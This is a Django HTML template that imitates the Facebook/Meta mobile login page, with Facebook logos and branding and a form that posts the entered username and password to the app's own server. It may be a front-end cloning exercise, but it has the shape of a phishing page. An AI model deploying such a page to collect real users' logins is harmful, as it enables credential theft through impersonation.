{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="{% static 'css/style.css '%}">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css">
    <link rel="icon" href="{% static 'image/facebook.png'%}">
    <title>Login From</title>
</head>
<body>
  <div class="container">
    <div id="iconDiv">
        <i class="fa-solid fa-arrow-left"></i>
    </div>
    <div class="header">
        <select name="" id="">
            <option value="uk">English(UK)</option>      
        </select>
        <br>
        <img src="{% static 'image/fb.jpg'%}" alt="" height="35px">
    </div>
    <!-- jinja2 -->
    <!-- {% if messages %} {% for mess in messages %} <p>{{mess}}</p> {% endfor %}{% endif %} -->
    <!-- jinja2 -->
    <form method="POST" action="" novalidate> {% csrf_token %}
    <div class="input-div">
        <input type="text" class="number" id="number" placeholder="Mobile number or email address" name="username">
        <div class="password-container">
            <input type="password" placeholder="Password" id="password" class="password" name="password">
            <i class="fa-solid fa-eye" id="showPassword"></i>
        </div>
    </div>
    <button class="btn-login" id="loginBtn" type="submit">Log In</button>
  </form>
    <p class="Forgotten-password">Forgotten Password?</p>
    <div class="footer">
        <button class="create-new-account-btn">Create new account</button>
        <div class="meta-section">
            <i class="fa-brands fa-meta"></i> <span class="meta">Meta</span>
        </div>
    </div>
    <div id="emailMobileRequiredError">
        <p class="error-header">Email address or mobile number required</p>
        <p>Enter your email address or mobile number to continue.</p>
        <button class="btn-ok" id="okBtn">ok</button>
    </div>
</div>

    <script src="{% static 'javascript/dom.js'%}"></script>
</body>
</html>